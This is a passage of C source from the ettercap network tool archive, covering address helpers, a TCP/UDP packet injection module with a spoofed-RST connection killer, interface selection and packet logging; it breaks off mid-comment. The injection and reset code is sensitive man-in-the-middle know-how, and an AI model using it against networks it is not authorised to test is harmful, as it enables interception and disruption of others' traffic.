memset(ip->addr, 0, IP6_ADDR_LEN); memcpy(ip->addr, "\xfe\x80\x00\x00", 4); memcpy(ip->addr + 4, "\x00\x00\x00\x00", 4); memcpy(ip->addr + 8, (u_char*)&h1, 4); memcpy(ip->addr + 12, (u_char*)&h2, 4); memcpy(ip->addr + 11, "\xff\xfe", 2); break; default: return -E_INVALID; } return E_SUCCESS; } /* * initialize a solicited-node IPv6 and link-layer address from a * given ip address. * * returns E_SUCCESS on success or -E_INVALID in case of a unsupported * address familily (actually only IPv6 is supported) */ int ip_addr_init_sol(struct ip_addr* sn, struct ip_addr* ip, u_int8 *tmac) { switch (ntohs(ip->addr_type)) { case AF_INET: (void) sn; (void) tmac; /* not applicable for IPv4 */ break; #ifdef WITH_IPV6 case AF_INET6: /* * initialize the ip_addr struct with the solicited-node * multicast prefix and copy the tailing 24-bit into the * address to form the complete solicited-node address */ ip_addr_init(sn, AF_INET6, (u_char*)IP6_SOL_NODE); memcpy((sn->addr + 13), (ip->addr + 13), 3); /* * initialize the MAC address derived from the solicited * node multicast IPv6 address by overwriting the tailing * 32-bit of the all-nodes link-layer multicast address for IPv6 */ memcpy(tmac, LLA_IP6_ALLNODES_MULTICAST, MEDIA_ADDR_LEN); memcpy((tmac + 2), (sn->addr + 12), 4); return E_SUCCESS; break; #endif } return -E_INVALID; } /* * convert to ascii an ip address */ char * ip_addr_ntoa(struct ip_addr *sa, char *dst) { switch (ntohs(sa->addr_type)) { case AF_INET: inet_ntop4(sa->addr, dst, IP_ASCII_ADDR_LEN); return dst; break; case AF_INET6: inet_ntop6(sa->addr, dst, IP6_ASCII_ADDR_LEN); return dst; break; }; return "invalid"; } const char * inet_ntop4(const u_char *src, char *dst, size_t size) { char str[IP_ASCII_ADDR_LEN]; int n; n = snprintf(str, IP_ASCII_ADDR_LEN, "%u.%u.%u.%u", src[0], src[1], src[2], src[3]); str[n] = '\0'; strncpy(dst, str, size); return dst; } const char * inet_ntop6(const u_char *src, char *dst, size_t size) { /* * Note that int32_t and int16_t need only be "at least" large enough * to contain a value of the specified size. On some systems, like * Crays, there is no such thing as an integer variable with 16 bits. * Keep this in mind if you think this function should have been coded * to use pointer overlays. All the world's not a VAX. */ char tmp[IP6_ASCII_ADDR_LEN], *tp; struct { int base, len; } best, cur; u_int words[NS_IN6ADDRSZ / NS_INT16SZ]; int i; best.len = 0; cur.len = 0; /* * Preprocess: * Copy the input (bytewise) array into a wordwise array. * Find the longest run of 0x00's in src[] for :: shorthanding. */ memset(words, '\0', sizeof words); for (i = 0; i < NS_IN6ADDRSZ; i += 2) words[i / 2] = (src[i] << 8) | src[i + 1]; best.base = -1; cur.base = -1; for (i = 0; i < (NS_IN6ADDRSZ / NS_INT16SZ); i++) { if (words[i] == 0) { if (cur.base == -1) cur.base = i, cur.len = 1; else cur.len++; } else { if (cur.base != -1) { if (best.base == -1 || cur.len > best.len) best = cur; cur.base = -1; } } } if (cur.base != -1) { if (best.base == -1 || cur.len > best.len) best = cur; } if (best.base != -1 && best.len < 2) best.base = -1; /* * Format the result. */ tp = tmp; for (i = 0; i < (NS_IN6ADDRSZ / NS_INT16SZ); i++) { /* Are we inside the best run of 0x00's? */ if (best.base != -1 && i >= best.base && i < (best.base + best.len)) { if (i == best.base) *tp++ = ':'; continue; } /* Are we following an initial run of 0x00s or any real hex? */ if (i != 0) *tp++ = ':'; /* Is this address an encapsulated IPv4? */ if (i == 6 && best.base == 0 && (best.len == 6 || (best.len == 5 && words[5] == 0xffff))) { if (inet_ntop4(src+12, tp, IP_ASCII_ADDR_LEN) != 0) return (NULL); tp += strlen(tp); break; } tp += sprintf(tp, "%x", words[i]); } /* Was it a trailing run of 0x00's? */ if (best.base != -1 && (best.base + best.len) == (NS_IN6ADDRSZ / NS_INT16SZ)) *tp++ = ':'; *tp++ = '\0'; /* * Check for overflow, copy, and we're done. */ if ((size_t)(tp - tmp) > size) { __set_errno (ENOSPC); return (NULL); } strncpy(dst, tmp, size); return dst; } /* Converts character string to IP address if possible */ int ip_addr_pton(char *str, struct ip_addr *addr) { struct in_addr inaddr; #ifdef WITH_IPV6 struct in6_addr in6addr; #endif if(inet_pton(AF_INET, str, &inaddr) == 1) { /* try IPv4 */ ip_addr_init(addr, AF_INET, (u_char*)&inaddr); return E_SUCCESS; } #ifdef WITH_IPV6 else if (inet_pton(AF_INET6, str, &in6addr) == 1) { /* try IPv6 */ ip_addr_init(addr, AF_INET6, (u_char*)&in6addr); return E_SUCCESS; } #endif else { return -E_INVALID; } } /* * convert a MAC address to a human readable form */ char *mac_addr_ntoa(u_char *mac, char *dst) { char str[ETH_ASCII_ADDR_LEN]; int n; n = snprintf(str, ETH_ASCII_ADDR_LEN, "%02X:%02X:%02X:%02X:%02X:%02X", mac[0], mac[1], mac[2], mac[3], mac[4], mac[5]); str[n] = '\0'; strncpy(dst, str, ETH_ASCII_ADDR_LEN); return dst; } /* * convert a string to a u_char mac[6] */ int mac_addr_aton(char *str, u_char *mac) { int i; u_int tmp[MEDIA_ADDR_LEN]; i = sscanf(str, "%02X:%02X:%02X:%02X:%02X:%02X", (u_int *)&tmp[0], (u_int *)&tmp[1], (u_int *)&tmp[2], (u_int *)&tmp[3], (u_int *)&tmp[4], (u_int *)&tmp[5]); /* incorrect parsing */ if (i != MEDIA_ADDR_LEN) { memset(mac, 0, MEDIA_ADDR_LEN); return 0; } for (i = 0; i < MEDIA_ADDR_LEN; i++) mac[i] = (u_char)tmp[i]; return i; } /* * returns 1 if the ip is a Global Unicast * returns 0 if not * returns -E_INVALID if address family is unknown */ int ip_addr_is_global(struct ip_addr *ip) { switch (ntohs(ip->addr_type)) { case AF_INET: /* Global for IPv4 means not status "RESERVED" by IANA */ if ( *ip->addr != 0x0 && /* not 0/8 */ *ip->addr != 0x7f && /* not 127/8 */ *ip->addr != 0x0a && /* not 10/8 */ (ntohs(*ip->addr16) & 0xfff0) != 0xac10 && /* not 172.16/12 */ ntohs(*ip->addr16) != 0xc0a8 && /* not 192.168/16 */ !ip_addr_is_multicast(ip) /* not 224/3 */ ) return 1; break; case AF_INET6: /* * as IANA does not appy masks > 8-bit for Global Unicast block, * only the first 8-bit are significant for this test. */ if ((*ip->addr & 0xe0) == 0x20) { /* * This may be extended in future as IANA assigns further ranges * to Global Unicast */ return 1; } break; default: return -E_INVALID; } return 0; } /* * returns 1 if the ip is multicast * returns 0 if not * returns -E_INVALID if address family is unknown */ int ip_addr_is_multicast(struct ip_addr *ip) { switch(ntohs(ip->addr_type)) { case AF_INET: if ((*ip->addr & 0xf0) == 0xe0) return 1; break; case AF_INET6: if ((*ip->addr & 0xff) == 0xff) return 1; break; default: return -E_INVALID; } return 0; } /* * returns E_SUCCESS if the ip is broadcast * returns -E_NOTFOUND if not */ int ip_addr_is_broadcast(struct ip_addr *sa) { struct ip_addr *nw; struct ip_addr *nm; u_int32* address; u_int32* netmask; u_int32* network; u_int32 broadcast; switch(ntohs(sa->addr_type)) { case AF_INET: if(!EC_GBL_IFACE->has_ipv4) return -E_INVALID; nm = &EC_GBL_IFACE->netmask; nw = &EC_GBL_IFACE->network; /* 255.255.255.255 is definitely broadcast */ if(!memcmp(sa->addr, "\xff\xff\xff\xff", IP_ADDR_LEN)) return E_SUCCESS; address = sa->addr32; netmask = nm->addr32; network = nw->addr32; broadcast = (*network) | ~(*netmask); if (broadcast == *address) return E_SUCCESS; break; case AF_INET6: if(!EC_GBL_IFACE->has_ipv6) return -E_INVALID; /* IPv6 has no such thing as a broadcast address. The closest * equivalent is the multicast address ff02::1. Packets sent to that * address are delivered to all link-local nodes. */ if(!memcmp(sa->addr, IP6_ALL_NODES, IP6_ADDR_LEN)) return E_SUCCESS; break; } return -E_NOTFOUND; } /* * returns E_SUCCESS if the ip address is local. * returns -E_NOTFOUND if it is non local. * the choice is make reading the EC_GBL_IFACE infos * * if the EC_GBL_IFACE is not filled (while reading from files) * returns -E_INVALID. */ int ip_addr_is_local(struct ip_addr *sa, struct ip_addr *ifaddr) { struct ip_addr *nm; struct ip_addr *nw; struct net_list* ip6; u_int32* address; u_int32* netmask; u_int32* network; unsigned int i, matched = 0; switch (ntohs(sa->addr_type)) { case AF_INET: nm = &EC_GBL_IFACE->netmask; nw = &EC_GBL_IFACE->network; /* the address 0.0.0.0 is used by DHCP and it is local for us*/ if ( !memcmp(&sa->addr, "\x00\x00\x00\x00", ntohs(sa->addr_len)) ) return E_SUCCESS; /* make a check on EC_GBL_IFACE (is it initialized ?) */ if ( !memcmp(&nw->addr, "\x00\x00\x00\x00", ntohs(sa->addr_len)) ) /* return UNKNOWN */ return -E_INVALID; address = sa->addr32; netmask = nm->addr32; network = nw->addr32; /* check if it is local */ if ((*address & *netmask) == *network) { if(ifaddr != NULL) memcpy(ifaddr, &EC_GBL_IFACE->ip, sizeof(*ifaddr)); return E_SUCCESS; } break; case AF_INET6: if(!EC_GBL_IFACE->has_ipv6) return -E_INVALID; LIST_FOREACH(ip6, &EC_GBL_IFACE->ip6_list, next) { nm = &ip6->netmask; nw = &ip6->network; address = sa->addr32; netmask = nm->addr32; network = nw->addr32; for(i = 0; i < IP6_ADDR_LEN / sizeof(u_int32); i++) { if (netmask[i] == 0) { /* no need to check further */ break; } else if((address[i] & netmask[i]) != network[i]) { matched = 0; break; } else { matched = 1; } } if(ifaddr != NULL) memcpy(ifaddr, &ip6->ip, sizeof(*ifaddr)); if (matched) return E_SUCCESS; } break; }; return -E_NOTFOUND; } int ip_addr_is_ours(struct ip_addr *ip) { struct net_list *i; switch(ntohs(ip->addr_type)) { case AF_INET: if(!ip_addr_cmp(ip, &EC_GBL_IFACE->ip)) return E_FOUND; else if(!ip_addr_cmp(ip, &EC_GBL_BRIDGE->ip)) return E_BRIDGE; else return -E_NOTFOUND; break; case AF_INET6: LIST_FOREACH(i, &EC_GBL_IFACE->ip6_list, next) { if(!ip_addr_cmp(ip, &i->ip)) return E_FOUND; } return -E_NOTFOUND; } return -E_INVALID; } int ip_addr_get_network(struct ip_addr *ip, struct ip_addr *netmask, struct ip_addr *network) { u_int32 ip4; u_int32 ip6[IP6_ADDR_LEN / sizeof(u_int32)]; if(ntohs(ip->addr_type) != ntohs(netmask->addr_type)) return -E_INVALID; switch(ntohs(ip->addr_type)) { case AF_INET: ip4 = *ip->addr32 & *netmask->addr32; ip_addr_init(network, AF_INET, (u_char*)&ip4); break; case AF_INET6: ip6[0] = ip->addr32[0] & netmask->addr32[0]; ip6[1] = ip->addr32[1] & netmask->addr32[1]; ip6[2] = ip->addr32[2] & netmask->addr32[2]; ip6[3] = ip->addr32[3] & netmask->addr32[3]; ip_addr_init(network, AF_INET6, (u_char*)&ip6); break; default: BUG("Invalid addr_type"); return -E_INVALID; break; } return E_SUCCESS; } int ip_addr_get_prefix(struct ip_addr* netmask) { size_t s; unsigned int i; int prefix = 0; u_int32* mask; u_int32 x; s = ntohs(netmask->addr_len) / sizeof(u_int32); mask = netmask->addr32; for(i = 0; i < s; i++) { x = mask[i]; x -= (x >> 1) & 0x55555555; x = (x & 0x33333333) + ((x >> 2) & 0x33333333); prefix += (((x + (x >> 4)) & 0xf0f0f0f) * 0x1010101) >> 24; } return prefix; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_inject.c000664 000000 000000 00000015225 13711276346 016345 0ustar00rootroot000000 000000 /* ettercap -- TCP/UDP injection module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include /* globals */ static SLIST_HEAD (, inj_entry) injectors_table; struct inj_entry { u_int32 type; u_int8 level; FUNC_INJECTOR_PTR(injector); SLIST_ENTRY (inj_entry) next; }; /* proto */ size_t inject_protocol(struct packet_object *po); /*******************************************/ /* * add an injector to the injector table */ void add_injector(u_int8 level, u_int32 type, FUNC_INJECTOR_PTR(injector)) { struct inj_entry *e; SAFE_CALLOC(e, 1, sizeof(struct inj_entry)); e->level = level; e->type = type; e->injector = injector; SLIST_INSERT_HEAD (&injectors_table, e, next); return; } /* * get an injector from the injector table */ void * get_injector(u_int8 level, u_int32 type) { struct inj_entry *e; SLIST_FOREACH (e, &injectors_table, next) { if (e->level == level && e->type == type) return (void *)e->injector; } return NULL; } size_t inject_protocol(struct packet_object *po) { FUNC_INJECTOR_PTR(injector); size_t len = 0; injector = get_injector(CHAIN_ENTRY, po->L4.proto); if (injector == NULL) return 0; /* Start the injector chain */ if (injector(po, &len) == E_SUCCESS) return len; /* if there's an error */ return 0; } /* * the idea is that the application will pass a buffer * and a len, and this function will split up the * buffer to fit the MTU and inject the resulting packet(s). */ int inject_buffer(struct packet_object *po) { /* the packet_object passed is a fake. * it is used only to pass: * - IP source and dest * - IPPROTO * - (tcp/udp) port source and dest * all the field have to be filled in and the buffer * has to be alloc'd */ struct packet_object *pd; size_t injected; u_char *pck_buf; int ret = E_SUCCESS; /* we can't inject in unoffensive mode or in bridge mode */ if (EC_GBL_OPTIONS->unoffensive || EC_GBL_OPTIONS->read || EC_GBL_OPTIONS->iface_bridge) { return -E_INVALID; } /* Duplicate the packet to modify the payload buffer */ pd = packet_dup(po, PO_DUP_NONE); /* Allocate memory for the packet (double sized)*/ SAFE_CALLOC(pck_buf, 1, (EC_GBL_IFACE->mtu * 2)); /* Loop until there's data to send */ do { /* * Slide to middle. First part is for header's stack'ing. * Second part is for packet data. */ pd->packet = pck_buf + EC_GBL_IFACE->mtu; /* Start the injector cascade */ injected = inject_protocol(pd); if (injected == 0) { ret = -E_NOTHANDLED; break; } /* Send on the wire */ send_to_L3(pd); /* Ready to inject the rest */ pd->DATA.inject_len -= injected; pd->DATA.inject += injected; } while (pd->DATA.inject_len); /* we cannot use packet_object_destroy because * the packet is not yet in the queue to tophalf. * so we have to free the duplicates by hand. */ SAFE_FREE(pck_buf); SAFE_FREE(pd->DATA.disp_data); SAFE_FREE(pd); return ret; } void inject_split_data(struct packet_object *po) { size_t max_len; max_len = EC_GBL_IFACE->mtu - (po->L4.header - (po->packet + po->L2.len) + po->L4.len); /* the packet has exceeded the MTU */ if (po->DATA.len > max_len) { po->DATA.inject = po->DATA.data + max_len; po->DATA.inject_len = po->DATA.len - max_len; po->DATA.delta -= po->DATA.len - max_len; po->DATA.len = max_len; } } /* * kill the connection on user request */ int user_kill(struct conn_object *co) { struct ec_session *s = NULL; void *ident; struct packet_object po; size_t ident_len, direction; struct tcp_status *status; /* we can kill only tcp connection */ if (co->L4_proto != NL_TYPE_TCP) return -E_FATAL; DEBUG_MSG("user_kill"); /* prepare the fake packet object */ memcpy(&po.L3.src, &co->L3_addr1, sizeof(struct ip_addr)); memcpy(&po.L3.dst, &co->L3_addr2, sizeof(struct ip_addr)); po.L4.src = co->L4_addr1; po.L4.dst = co->L4_addr2; po.L4.proto = co->L4_proto; /* retrieve the ident for the session */ ident_len = tcp_create_ident(&ident, &po); /* get the session */ if (session_get(&s, ident, ident_len) == -E_NOTFOUND) { SAFE_FREE(ident); return -E_INVALID; } DEBUG_MSG("user_kill: session found"); /* Select right comunication way */ direction = tcp_find_direction(s->ident, ident); SAFE_FREE(ident); status = (struct tcp_status *)s->data; /* send the reset. at least one should work */ send_tcp(&po.L3.src, &po.L3.dst, po.L4.src, po.L4.dst, htonl(status->way[!direction].last_ack), 0, TH_RST, NULL, 0); send_tcp(&po.L3.dst, &po.L3.src, po.L4.dst, po.L4.src, htonl(status->way[direction].last_ack), 0, TH_RST, NULL, 0); return E_SUCCESS; } /* * inject from user */ int user_inject(u_char *buf, size_t size, struct conn_object *co, int which) { struct packet_object po; DEBUG_MSG("user_inject"); /* prepare the fake packet object */ if (which == 1) { memcpy(&po.L3.src, &co->L3_addr1, sizeof(struct ip_addr)); memcpy(&po.L3.dst, &co->L3_addr2, sizeof(struct ip_addr)); po.L4.src = co->L4_addr1; po.L4.dst = co->L4_addr2; } else { memcpy(&po.L3.dst, &co->L3_addr1, sizeof(struct ip_addr)); memcpy(&po.L3.src, &co->L3_addr2, sizeof(struct ip_addr)); po.L4.dst = co->L4_addr1; po.L4.src = co->L4_addr2; } po.L4.proto = co->L4_proto; po.DATA.inject = buf; po.DATA.inject_len = size; po.packet = NULL; po.DATA.disp_data = NULL; /* do the dirty job */ inject_buffer(&po); /* mark the connection as injected */ co->flags = CONN_INJECTED; return E_SUCCESS; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_interfaces.c000664 000000 000000 00000003635 13711276346 017216 0ustar00rootroot000000 000000 /* ettercap -- GUI management Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #ifdef HAVE_NCURSES #include #endif #include #if defined HAVE_GTK || defined HAVE_GTK3COMPAT #include #endif #if defined HAVE_GTK3 #include #endif #include /*******************************************/ void select_daemon_interface(void) { DEBUG_MSG("select_daemon_interface"); set_daemon_interface(); } void select_text_interface(void) { DEBUG_MSG("select_text_interface"); set_text_interface(); } void select_curses_interface(void) { DEBUG_MSG("select_curses_interface"); #ifdef HAVE_NCURSES /* check if the stdout is available */ if (isatty(fileno(stdout)) <= 0) FATAL_ERROR("Cannot use Curses if stdout is redirected"); set_curses_interface(); #else FATAL_ERROR("Curses support not compiled in %s", EC_GBL_PROGRAM); #endif } void select_gtk_interface(void) { DEBUG_MSG("select_gtk_interface"); #if defined HAVE_GTK || defined HAVE_GTK3 || defined HAVE_GTK3COMPAT set_gtk_interface(); #else FATAL_ERROR("GTK support is not compiled in %s", EC_GBL_PROGRAM); #endif } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_libettercap.c000664 000000 000000 00000003377 13711276346 017374 0ustar00rootroot000000 000000 /* ettercap -- global variables handling module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include /* global vars */ /* proto */ /*******************************************/ void libettercap_init(char* program, char* version) { ec_globals_alloc(); EC_GBL_PROGRAM = strdup(program); EC_GBL_VERSION = strdup(version); SAFE_CALLOC(EC_GBL_DEBUG_FILE, strlen(EC_GBL_PROGRAM) + strlen("-") + strlen(EC_GBL_VERSION) + strlen("_debug.log") + 1, sizeof(char)); sprintf(EC_GBL_DEBUG_FILE, "%s-%s_debug.log", EC_GBL_PROGRAM, EC_GBL_VERSION); DEBUG_INIT(); } void libettercap_load_conf(void) { /* load the configuration file */ load_conf(); } void libettercap_ui_init() { /* initialize the user interface */ ui_init(); } void libettercap_ui_start() { /* start the actual user interface */ ui_start(); } void libettercap_ui_cleanup() { /* shutdown the user interface */ ui_cleanup(); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_log.c000664 000000 000000 00000046062 13711276346 015655 0ustar00rootroot000000 000000 /* ettercap -- log handling module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. */ #include #include #include #include #include #include #include #include #include #include #include #include #include /* globals */ /* zero is formally a valid value for an opened file descriptor * so we need a custom initializer */ static struct log_fd fdp = {0, NULL, -1}; static struct log_fd fdi = {0, NULL, -1}; /* protos */ static void log_packet(struct packet_object *po); static void log_info(struct packet_object *po); static pthread_mutex_t log_mutex = PTHREAD_MUTEX_INITIALIZER; #define LOG_LOCK do{ pthread_mutex_lock(&log_mutex); } while(0) #define LOG_UNLOCK do{ pthread_mutex_unlock(&log_mutex); } while(0) /************************************************/ /* * this function is executed at high privs. * open the file descriptor for later use * and set the log level * LOG_PACKET = packet + info * LOG_INFO = only info */ int set_loglevel(int level, char *filename) { char eci[strlen(filename)+5]; char ecp[strlen(filename)+5]; /* close any previously opened file */ log_stop(); /* if we want to stop logging, return here */ if (level == LOG_STOP) { DEBUG_MSG("set_loglevel: stopping the log process"); return E_SUCCESS; } DEBUG_MSG("set_loglevel(%d, %s)", level, filename); /* all the host type will be unknown, warn the user */ if (EC_GBL_OPTIONS->read) { USER_MSG("*********************************************************\n"); USER_MSG("WARNING: while reading form file we cannot determine \n"); USER_MSG("if an host is local or not because the ip address of \n"); USER_MSG("the NIC may have been changed from the time of the dump. \n"); USER_MSG("*********************************************************\n\n"); } snprintf(eci, strlen(filename)+5, "%s.eci", filename); snprintf(ecp, strlen(filename)+5, "%s.ecp", filename); memset(&fdp, 0, sizeof(struct log_fd)); memset(&fdi, 0, sizeof(struct log_fd)); /* open the file(s) */ switch(level) { case LOG_PACKET: if (EC_GBL_OPTIONS->compress) { fdp.type = LOG_COMPRESSED; } else { fdp.type = LOG_UNCOMPRESSED; } /* create the file */ if (log_open(&fdp, ecp) != E_SUCCESS) return -E_FATAL; /* initialize the log file */ log_write_header(&fdp, LOG_PACKET); /* add the hook point to DISPATCHER */ hook_add(HOOK_DISPATCHER, &log_packet); /* no break here, loglevel is incremental */ /* fall through */ case LOG_INFO: if (EC_GBL_OPTIONS->compress) { fdi.type = LOG_COMPRESSED; } else { fdi.type = LOG_UNCOMPRESSED; } /* create the file */ if (log_open(&fdi, eci) != E_SUCCESS) return -E_FATAL; /* initialize the log file */ log_write_header(&fdi, LOG_INFO); /* add the hook point to DISPATCHER */ hook_add(HOOK_DISPATCHER, &log_info); /* add the hook for the ARP packets */ hook_add(HOOK_PACKET_ARP, &log_info); /* add the hook for ICMP packets */ hook_add(HOOK_PACKET_ICMP, &log_info); /* add the hook for DHCP packets */ /* (fake icmp packets from DHCP discovered GW and DNS) */ hook_add(HOOK_PROTO_DHCP_PROFILE, &log_info); break; } atexit(log_stop); return E_SUCCESS; } /* * removes the hook points and closes the log files */ void log_stop(void) { DEBUG_MSG("log_stop"); /* remove all the hooks */ hook_del(HOOK_DISPATCHER, &log_packet); hook_del(HOOK_DISPATCHER, &log_info); hook_del(HOOK_PACKET_ARP, &log_info); hook_del(HOOK_PACKET_ICMP, &log_info); hook_del(HOOK_PROTO_DHCP_PROFILE, &log_info); log_close(&fdp); log_close(&fdi); } /* * open a file in the appropriate log_fd struct * * whether or not the log is compressed * fd->fd becomes to always be a file descriptor of the opened file * and fd->cfd is a non-NULL gzip stream descriptor when the log is to be compressed * * TODO: it is likely that we dont need 'type' field in 'log_fd' struct * to mark a compressed log; non-NULL 'cfd' field becomes such a flag */ int log_open(struct log_fd *fd, char *filename) { fd->fd = open(filename, O_CREAT|O_TRUNC|O_RDWR|O_BINARY, S_IRUSR|S_IWUSR|S_IRGRP|S_IWGRP|S_IROTH|S_IWOTH); if (fd->fd == -1) SEMIFATAL_ERROR("Can't create %s: %s", filename, strerror(errno)); else { if (EC_GBL_OPTIONS->compress) { int zerr; fd->cfd = gzdopen(fd->fd, "wb9"); if (fd->cfd == NULL) SEMIFATAL_ERROR("%s", gzerror(fd->cfd, &zerr)); }; }; return E_SUCCESS; } /* * closes a log_fd struct */ void log_close(struct log_fd *fd) { DEBUG_MSG("log_close: type: %d [%p][%d]", fd->type, fd->cfd, fd->fd); if (fd->cfd) { /* gzclose() on the gzip stream descriptor (fd->cfd) * will also close the file descriptor (fd->fd) */ gzclose(fd->cfd); fd->cfd = NULL; fd->fd = -1; /* to prevent double closing the file descriptor */ }; if (fd->fd >= 0) { close(fd->fd); fd->fd = -1; }; } /* * set the owner:group of the packet and info logfiles to new_uid:new_gid * if the current owners are old_uid:old_gid respectively * * prefer this way to unconditionally setting the new ownership as far as * the file may be intentionally located in the set-group-ID directory */ void reset_logfile_owners(uid_t old_uid, gid_t old_gid, uid_t new_uid, gid_t new_gid) { struct stat f; uid_t uid; gid_t gid; /* packet logfile */ if (fdp.fd >= 0) { DEBUG_MSG("reset_logfile_owners: packet log file"); if (fstat(fdp.fd, &f) == 0) { uid = (f.st_uid == old_uid) ? new_uid : (uid_t)-1; gid = (f.st_gid == old_gid) ? new_gid : (gid_t)-1; if ( fchown(fdp.fd, uid, gid) != 0 ) ERROR_MSG("fchown()"); } else ERROR_MSG("fstat()"); }; /* info logfile */ if (fdi.fd >= 0) { DEBUG_MSG("reset_logfile_owners: info log file"); if (fstat(fdi.fd, &f) == 0) { uid = (f.st_uid == old_uid) ? new_uid : (uid_t)-1; gid = (f.st_gid == old_gid) ? new_gid : (gid_t)-1; if ( fchown(fdi.fd, uid, gid) != 0 ) ERROR_MSG("fchown()"); } else ERROR_MSG("fstat()"); }; } /* * function registered to HOOK_DISPATCHER * check the regex (if present) and log packets */ static void log_packet(struct packet_object *po) { /* * skip packet sent (spoofed) by us * else we will get duplicated hosts with our mac address * this is necessary because check_forwarded() is executed * in ec_ip.c, but here we are getting even arp packets... */ EXECUTE(EC_GBL_SNIFF->check_forwarded, po); if (po->flags & PO_FORWARDED) return; /* * recheck if the packet is compliant with the visualization filters. * we need to redo the test, because here we are hooked to ARP and ICMP * packets that are before the test in ec_decode.c */ po->flags |= PO_IGNORE; EXECUTE(EC_GBL_SNIFF->interesting, po); if ( po->flags & PO_IGNORE ) return; /* the regex is set, respect it */ if (EC_GBL_OPTIONS->regex) { if (regexec(EC_GBL_OPTIONS->regex, (const char*)po->DATA.disp_data, 0, NULL, 0) == 0) log_write_packet(&fdp, po); } else { /* if no regex is set, dump all the packets */ log_write_packet(&fdp, po); } } /* * function registered to HOOK_DISPATCHER * it is a wrapper to the real one */ static void log_info(struct packet_object *po) { /* * skip packet sent (spoofed) by us * else we will get duplicated hosts with our mac address * this is necessary because check_forwarded() is executed * in ec_ip.c, but here we are getting even arp packets... */ EXECUTE(EC_GBL_SNIFF->check_forwarded, po); if (po->flags & PO_FORWARDED) return; /* * recheck if the packet is compliant with the visualization filters. * we need to redo the test, because here we are hooked to ARP and ICMP * packets that are before the test in ec_decode.c */ po->flags |= PO_IGNORE; EXECUTE(EC_GBL_SNIFF->interesting, po); if ( po->flags & PO_IGNORE ) return; /* if all the tests are ok, write it to the disk */ if (po->L4.proto == NL_TYPE_ICMP || po->L3.proto == htons(LL_TYPE_ARP)) log_write_info_arp_icmp(&fdi, po); else log_write_info(&fdi, po); } /* * initialize the log file with * the proper header */ int log_write_header(struct log_fd *fd, int type) { struct log_global_header lh; int c, zerr; DEBUG_MSG("log_write_header : type %d", type); memset(&lh, 0, sizeof(struct log_global_header)); /* the magic number */ lh.magic = htons(EC_LOG_MAGIC); /* the offset of the first header is equal to the size of this header */ lh.first_header = htons(sizeof(struct log_global_header)); strlcpy(lh.version, EC_GBL_VERSION, sizeof(lh.version)); /* creation time of the file */ gettimeofday(&lh.tv, 0); lh.tv.tv_sec = htonl(lh.tv.tv_sec); lh.tv.tv_usec = htonl(lh.tv.tv_usec); lh.type = htonl(type); LOG_LOCK; if (fd->type == LOG_COMPRESSED) { c = gzwrite(fd->cfd, &lh, sizeof(lh)); ON_ERROR(c, -1, "%s", gzerror(fd->cfd, &zerr)); } else { c = write(fd->fd, &lh, sizeof(lh)); ON_ERROR(c, -1, "Can't write to logfile"); } LOG_UNLOCK; return c; } /* log all the packet to the logfile */ void log_write_packet(struct log_fd *fd, struct packet_object *po) { struct log_header_packet hp; int c, zerr; memset(&hp, 0, sizeof(struct log_header_packet)); /* adjust the timestamp */ memcpy(&hp.tv, &po->ts, sizeof(struct timeval)); hp.tv.tv_sec = htonl(hp.tv.tv_sec); hp.tv.tv_usec = htonl(hp.tv.tv_usec); memcpy(&hp.L2_src, &po->L2.src, MEDIA_ADDR_LEN); memcpy(&hp.L2_dst, &po->L2.dst, MEDIA_ADDR_LEN); memcpy(&hp.L3_src, &po->L3.src, sizeof(struct ip_addr)); memcpy(&hp.L3_dst, &po->L3.dst, sizeof(struct ip_addr)); hp.L4_flags = po->L4.flags; hp.L4_proto = po->L4.proto; hp.L4_src = po->L4.src; hp.L4_dst = po->L4.dst; /* the length of the payload */ hp.len = htonl(po->DATA.disp_len); LOG_LOCK; if (fd->type == LOG_COMPRESSED) { c = gzwrite(fd->cfd, &hp, sizeof(hp)); ON_ERROR(c, -1, "%s", gzerror(fd->cfd, &zerr)); c = gzwrite(fd->cfd, po->DATA.disp_data, po->DATA.disp_len); ON_ERROR(c, -1, "%s", gzerror(fd->cfd, &zerr)); } else { c = write(fd->fd, &hp, sizeof(hp)); ON_ERROR(c, -1, "Can't write to logfile"); c = write(fd->fd, po->DATA.disp_data, po->DATA.disp_len); ON_ERROR(c, -1, "Can't write to logfile"); } LOG_UNLOCK; } /* * log passive information * * hi is the source * hid is the dest, used to log 